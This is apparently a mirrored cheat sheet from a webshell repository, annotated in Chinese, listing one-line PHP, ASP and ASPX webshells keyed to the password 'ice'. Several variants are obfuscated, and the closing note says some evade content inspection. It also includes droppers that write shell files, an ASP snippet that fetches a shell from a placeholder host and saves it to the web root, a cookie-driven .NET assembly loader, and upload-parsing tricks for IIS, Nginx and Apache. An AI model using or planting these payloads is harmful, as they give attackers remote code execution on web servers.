mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
86 lines
No EOL
2.5 KiB
Text
86 lines
No EOL
2.5 KiB
Text
GIF89a 图片头
|
||
|
||
[+]---------------------------------PHP---------------------------------[+]
|
||
<?php @eval($_POST['ice']);?>
|
||
|
||
<?php header('status:404');${${eval($_POST[ice])}};?>
|
||
|
||
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
|
||
|
||
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
|
||
|
||
|
||
<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>
|
||
|
||
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
|
||
// 同目录生成 ice.php
|
||
|
||
[+]---------------------------------PHP---------------------------------[+]
|
||
|
||
|
||
|
||
***************************************************************************
|
||
|
||
|
||
|
||
[+]---------------------------------ASP---------------------------------[+]
|
||
<%eval request("ice")%>
|
||
|
||
<%www=REquEst("ice"):EvaL(www)%>
|
||
|
||
<%
|
||
Dim ConKey:ConKey="ice"
|
||
Dim InValue:InValue=Request(ConKey)
|
||
eval(InValue)
|
||
%>
|
||
|
||
<%E=request("ice") execute E%>
|
||
|
||
<%
|
||
Set xPost = createObject("Microsoft.XMLHTTP")
|
||
xPost.Open "GET","http://www.xxx.com/shell.txt",0 'asp木马文本格式地址
|
||
xPost.Send()
|
||
Set sGet = createObject("ADODB.Stream")
|
||
sGet.Mode = 3
|
||
sGet.Type = 1
|
||
sGet.Open()
|
||
sGet.Write(xPost.responseBody)
|
||
sGet.SaveToFile "E:\WWWROOT\xxx.asp",2
|
||
%>
|
||
|
||
|
||
┼攠數畣整爠煥敵瑳∨≡┩愾 // ANSI—>Unicode ,密码: a
|
||
┼攠數畣整爠煥敵瑳∨捩≥┩愾 //密码 ice
|
||
|
||
|
||
|
||
上传一个图片一句话(xxx.jpg)。再上传一个.asp文件去包含: <!--#include file="xxx.jpg" -->
|
||
|
||
|
||
[+]---------------------------------ASP---------------------------------[+]
|
||
|
||
|
||
|
||
***************************************************************************
|
||
|
||
|
||
|
||
[+]---------------------------------ASPX---------------------------------[+]
|
||
|
||
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
|
||
|
||
<%@ Page Language="C#" ValidateRequest="false" %>
|
||
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
|
||
|
||
[+]---------------------------------ASPX---------------------------------[+]
|
||
|
||
IIS 6.0 解析: x.asp/x.jpg x.asp;x.jpg ;如果遇到安全狗,畸形会被拦截,可以尝试将一句话的文件名改为 ;x.asp;x.jpg (IIS 7.5 可以试试 a.aspx.a;.a.aspx.jpg..jpg 这样的)
|
||
Nginx 解析: x.jpg/.php x.jpg%00.php
|
||
Apache : x.php.x
|
||
xx.jpg.jsp,xx.png.jsp
|
||
|
||
|
||
以上为 php、asp、aspx一句话木马的客户端,密码均为 ice 。这是一句话的几种写法,有些可以逃过内容审查
|
||
|
||
-- 冰锋刺客 --
|
||
2012-07-21 |